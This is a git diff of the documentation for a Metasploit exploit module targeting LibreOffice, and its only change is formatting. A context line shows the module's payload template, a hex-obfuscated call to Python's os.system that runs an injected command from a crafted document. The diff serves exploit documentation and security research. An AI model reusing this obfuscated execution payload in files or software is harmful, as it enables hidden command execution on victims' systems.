diff --git a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md index 695cfee7f2..b8abb033d2 100644 --- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md +++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md @@ -20,7 +20,7 @@ getattr(__import__(“\x6f\x73”),“\x73\x79\x73\x74\x65\x6d”)(“<%= @cmd %>”) ``` - To avoid any python error, the h1 title written in the document is a python comment `#`. + To avoid any python error, the `h1` title written in the document is a python comment `#`. ## Vulnerable Application